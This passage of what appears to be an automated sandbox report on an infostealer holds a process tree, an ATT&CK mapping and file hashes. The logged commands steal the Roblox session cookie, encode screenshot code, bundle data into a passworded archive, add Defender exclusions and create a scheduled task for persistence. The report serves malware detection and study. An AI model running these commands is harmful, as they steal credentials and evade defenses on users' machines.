QBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
PID:328

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bq15xoyl\bq15xoyl.cmdline"
6⤵
PID:5684

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D3.tmp" "c:\Users\Admin\AppData\Local\Temp\bq15xoyl\CSC449C03818A954F088B9C56D7553F91A.TMP"
7⤵
PID:5812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5152

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5472

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:5516

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
5⤵
- Views/modifies file attributes
PID:5656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5736

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:5852

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
5⤵
- Views/modifies file attributes
PID:6004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6048

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:6132

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3632

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:4628

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:4368

C:\Windows\system32\getmac.exe
getmac
5⤵
PID:5480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:5464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35122\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\DUlNk.zip" *"
4⤵
PID:2580

C:\Users\Admin\AppData\Local\Temp\_MEI35122\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI35122\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\DUlNk.zip" *
5⤵
PID:2612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:1744

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
5⤵
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:1496

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:5200

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:5392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
PID:2380

C:\Windows\Runtime broker.exe
"C:\Windows\Runtime broker.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Runtime broker.exe'
3⤵
PID:5636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime broker.exe'
3⤵
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Runtime Broker.exe'
3⤵
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
3⤵
PID:2148

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
3⤵
- Creates scheduled task(s)
PID:2668

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
73eda0ab9450c4b554fc58c61ff7c50e

SHA1
0525da4d2e28aea61d7bea6259fd86526b124b1c

SHA256
acaa2c9bea959e851e7f20ed7cf994ed72cee178e25f2212b2af55d423effbda

SHA512
f1863be7e4d32da372c93daf6d5c995174e08ef8ce55b9e023ccc2c6c7c02de787eafba6173d6fc39081640e5aef3399396ffbadb0f988ab5e0361c7ac4cd386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
408641808e457ab6e23d62e59b767753

SHA1
4205cfa0dfdfee6be08e8c0041d951dcec1d3946

SHA256
3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

SHA512
e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4914eb0b2ff51bfa48484b5cc8454218

SHA1
6a7c3e36ce53b42497884d4c4a3bda438dd4374b

SHA256
7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

SHA512
83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
80b42fe4c6cf64624e6c31e5d7f2d3b3

SHA1
1f93e7dd83b86cb900810b7e3e43797868bf7d93

SHA256
ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d

SHA512
83c1c744c15a8b427a1d3af677ec3bfd0353875a60fe886c41570981e17467ebbb59619b960ca8c5c3ab1430946b0633ea200b7e7d84ab6dca88b60c50055573

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll
Filesize
323KB

MD5
8610f4d3cdc6cc50022feddced9fdaeb

SHA1
4b60b87fd696b02d7fce38325c7adfc9e806f650

SHA256
ac926c92ccfc3789a5ae571cc4415eb1897d500a79604d8495241c19acdf01b9

SHA512
693d1af1f89470eab659b4747fe344836affa0af8485b0c0635e2519815e5a498f4618ea08db9dcf421aac1069a04616046207ee05b9ed66c0a1c4a8f0bddd09

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES79D3.tmp
Filesize
1KB

MD5
b566f750753893c09d81c3c42f382dc1

SHA1
463f3a01e81b52fd4c20d5dc1551605da092fc07

SHA256
23bef256c7681a4cc85fb1e5a9b0cf5f4c08d5d553d56d20976a1b5207d0ddff

SHA512
dd9b72e42b3f4caacce35cb648c19b4e3235d316a642b0a80e3ccfc879eae62fca51bf71e68644a0a00263c455f2656b3de543153ab5ca4f62b07d4b2c003993

Download Submit
C:\Users\Admin\AppData\Local\Temp\Reaper.exe
Filesize
42KB

MD5
c7d407dbbe4d83fc37f2fa4f51276c76

SHA1
c6f1f596be6a99566d5862a0aa2f16b90eecb05c

SHA256
fc69c7aee21fa012c9e9de28e35c20eb9ddf473c0ac0b482faebc203dd97999c

SHA512
ed49a442172bdadd6f91db48db3003c5cb749868e9c40a90e8f6b65cdf4b6899d0132cfd70fb08a248412118353d0b4477606385244b90e0883ecdda213403c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\VCRUNTIME140.dll
Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_bz2.pyd
Filesize
48KB

MD5
2d461b41f6e9a305dde68e9c59e4110a

SHA1
97c2266f47a651e37a72c153116d81d93c7556e8

SHA256
abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

SHA512
eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_ctypes.pyd
Filesize
58KB

MD5
1adfe4d0f4d68c9c539489b89717984d

SHA1
8ae31b831b3160f5b88dda58ad3959c7423f8eb2

SHA256
64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

SHA512
b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_hashlib.pyd
Filesize
35KB

MD5
f10d896ed25751ead72d8b03e404ea36

SHA1
eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

SHA256
3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

SHA512
7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_lzma.pyd
Filesize
85KB

MD5
3798175fd77eded46a8af6b03c5e5f6d

SHA1
f637eaf42080dcc620642400571473a3fdf9174f

SHA256
3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

SHA512
1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_queue.pyd
Filesize
25KB

MD5
decdabaca104520549b0f66c136a9dc1

SHA1
423e6f3100013e5a2c97e65e94834b1b18770a87

SHA256
9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

SHA512
d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_socket.pyd
Filesize
43KB

MD5
bcc3e26a18d59d76fd6cf7cd64e9e14d

SHA1
b85e4e7d300dbeec942cb44e4a38f2c6314d3166

SHA256
4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

SHA512
65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_sqlite3.pyd
Filesize
56KB

MD5
eb6313b94292c827a5758eea82d018d9

SHA1
7070f715d088c669eda130d0f15e4e4e9c4b7961

SHA256
6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

SHA512
23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_ssl.pyd
Filesize
62KB

MD5
2089768e25606262921e4424a590ff05

SHA1
bc94a8ff462547ab48c2fbf705673a1552545b76

SHA256
3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

SHA512
371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\base_library.zip
Filesize
1.8MB

MD5
e17ce7183e682de459eec1a5ac9cbbff

SHA1
722968ca6eb123730ebc30ff2d498f9a5dad4cc1

SHA256
ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d

SHA512
fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\blank.aes
Filesize
114KB

MD5
b22152db64d0dbf9ea412cee1ea65c57

SHA1
b17afb2a610792c50ecd4077f97f2916ddf3f3a9

SHA256
f6fe141803df7ee3083c013aa24e21171c12a6019d82acd4b01d66084c9a1993

SHA512
7b1311359eb2933852f44f2c6554740824d9049fa10f93b2e10838a14d0f6331f904c352d6d8754795e35e1d182b74556f5182c4c7f7a908aabea7bb217873ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libcrypto-1_1.dll
Filesize
1.1MB

MD5
dffcab08f94e627de159e5b27326d2fc

SHA1
ab8954e9ae94ae76067e5a0b1df074bccc7c3b68

SHA256
135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15

SHA512
57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libcrypto-1_1.dll
Filesize
256KB

MD5
42a72b1a3cdca81b2d76a081b9385979

SHA1
24dd8563a0673825b381ebcab3be43d5745084da

SHA256
6bafe900458e9979cf194e1dfd231914cb7948688b41442c6befe6a5f7246bac

SHA512
456dcf0feb1456fa2ec779cd44029ab68e2b568e0957a9f8021d4bc5cb482ecb87ef66637ed06698e4c2f47daea71605f9f6f01fa62e3f3c4dd166d1c057601c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libffi-8.dll
Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libssl-1_1.dll
Filesize
204KB

MD5
8e8a145e122a593af7d6cde06d2bb89f

SHA1
b0e7d78bb78108d407239e9f1b376e0c8c295175

SHA256
a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1

SHA512
d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\python311.dll
Filesize
1.6MB

MD5
7e939fbb3556c724d84842b63c517e76

SHA1
a3199dee37a70759aac224bb472ab4d35ad9b931

SHA256
9128bb11a5032220e3a58428f51fa80348498c9eeadb28ae84eaa6667ecc8a9a

SHA512
3f0c38437ca3a66015bf9c46ca5f9796449e0b47e2678ada1d25cb4c44bd6726d294ca2a8a6143eba6c4bc89dddb61109cbae12976a70d984972b75ad889e321

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\python311.dll
Filesize
1.6MB

MD5
5792adeab1e4414e0129ce7a228eb8b8

SHA1
e9f022e687b6d88d20ee96d9509f82e916b9ee8c

SHA256
7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

SHA512
c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\select.pyd
Filesize
25KB

MD5
90fea71c9828751e36c00168b9ba4b2b

SHA1
15b506df7d02612e3ba49f816757ad0c141e9dc1

SHA256
5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d

SHA512
e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\sqlite3.dll
Filesize
622KB

MD5
395332e795cb6abaca7d0126d6c1f215

SHA1
b845bd8864cd35dcb61f6db3710acc2659ed9f18

SHA256
8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c

SHA512
8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\sqlite3.dll
Filesize
448KB

MD5
938c47b818ca48043594d90851e7e1b9

SHA1
b9e82d0c7dd161030172c4e34a61c8ce48aecfbd

SHA256
149a2caaaae9e479ca4657259b3d0d1acab3b41111e60d1b662d29a1fb18f879

SHA512
0dbb0ecbaf42f18a33552b6ff550cf471fa2b4e7f4988ff983b5b0fd7b6b36e54656f6f9b2f2cb18a0717aa2c8a3bd78ed55839929383a57dd512cf0c3a0e930

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\ucrtbase.dll
Filesize
987KB

MD5
a4781a4c41ada12c5420ee2b9bcbfda3

SHA1
7c394165fafd176908f38c6c5ffe065751b6a868

SHA256
0ef5cc705f0752489ea8f2a79116ca842142cee9f2bbb60ef24e2524b0066a09

SHA512
0055a67d02c59d5f63a3d7b56fe934ae56a80fc56e11819de62ae567fca74724ac6bc885bac37cd3f11a7abd243b9990f8edd674becd7b7a4f89a3325ebab104

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35122\unicodedata.pyd
Filesize
295KB

MD5
c2556dc74aea61b0bd9bd15e9cd7b0d6

SHA1
05eff76e393bfb77958614ff08229b6b770a1750

SHA256
987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d

SHA512
f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lvwfpiy5.12c.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bq15xoyl\bq15xoyl.dll
Filesize
4KB

MD5
02f9a84a382ed4efff60dd2fac938adf

SHA1
3f536d4f27e24c02dad06185e35b56e6a80f00e8

SHA256
cc83e994d3e0c80f32ba0354f4a3be800831c8f82146c33a52514acdcbfc6abe

SHA512
9a796ede9c29554339f51884f22edea713a7cc1ac7901ddbff1568915ba39f6cc585ba86ca9de22b8a97dc2c5e2caebafbda18e2626a2bb19b5a696c3d4d96d9

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
Filesize
1.8MB

MD5
10d713a536057387095555b7c812349e

SHA1
ee59e3ba7ae12844e07d582b3b2b023717161aa1

SHA256
a9a1a3b13a335e569be3a0abf7db6b42a17ef80a0137f29a14eb1418aa0b892c

SHA512
e77a5806760207c5b32d59f2af3673a0a1640072b65b98000d9c45c91b785d767a61a1bc74bb0fe6ca7e610cae92125c152d359a1a21d2e19e393abbe38d7d3b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
Filesize
3.2MB

MD5
0d217f44d1e2502124421f93a267c6d3

SHA1
d877412b9401904f726683762b4d8d33e88f9732

SHA256
8d7a25a0444b9a434c207839eded1b3624cc9d7a6d46e3e1fb0a59b91c49a679

SHA512
